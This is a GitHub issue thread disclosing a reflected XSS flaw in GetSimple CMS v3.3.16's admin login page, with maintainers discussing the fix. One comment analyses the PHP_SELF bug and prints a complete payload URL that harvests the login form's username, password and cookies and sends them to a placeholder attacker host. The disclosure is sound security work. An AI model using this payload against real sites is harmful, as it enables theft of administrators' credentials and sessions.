New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' #1330
Comments
|
Any update on this? I signed up and messaged all admins on GS forum and got 1 reply from Shawn. |
|
Not sure I ever got the email, let me check |
|
Got it, overlooked |
|
Stupid question, mostly a curiosity do you know WHY it breaks the css? I see no reason it should http://localhost:8888/dev/getsimple/develop/admin/index.php/asdfasdfasdfasdfasf |
|
Its your myself(false) function (defined in basic.php) that is echo'd into the form action.
Analysis
return htmlentities(basename($_SERVER['PHP_SELF']), ENT_QUOTES);
$_SERVER[PHP_SELF'] = "/admin/index.php/breakout"
https://www.php.net/manual/en/function.basename.php
$_SERVER['QUERY_STRING'] = ""As a final result, we end up with: The above "breakout?" is HTML Encoded, but since it's already the action of a form, it will execute javascript put there when the form is posted. The '?' at the end presents some initial complications, but it can be discarded out as a comment by adding '//' at the end (URL Encoded). The HTML Encoding can also be bypassed, as since its JavaScript, you can just use decodeURIComponent() to get any character back you want to use. Example Payload to steal username and password: http://<TARGET>/admin/index.php/index/javascript:var dFslash = "%2f%2f";var username = document.forms[0].elements[0].value;var password = document.forms[0].elements[1].value;var uri = "http:"+decodeURIComponent(dFslash)+"<ATTACKER>?|USER="+username+"|PASS="+password+"|"+document.cookie;xhr = new XMLHttpRequest();xhr.open("GET", uri, true);xhr.send();alert("Welcome "+username+"! Sending your credentails and session to a remote attacker!");window.location.replace("test");%2f%2f |
|
Yeah its already fixed in 3.4, PHP_SELF is all over the place, added mitigation in 3.3.17, will have to look through the rest for hardcoded ones Thanks for the full disclosure, still wondering about the CSS flow breaking.... lol |
|
doh, thanks!, I saw it loading and no network error, all assets in 3.4 are absolute now, except for style.php, that might be a bug. !! Interesting that apache doesn't discard pathing after .php, I never noticed this before. |












Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16 in 'admin/index.php' login portal webpage allows remote attackers to execute JavaScript code in the clients browser & harvest login credentials via client clicking a link, entering credentials, and submitting login form.
The text was updated successfully, but these errors were encountered: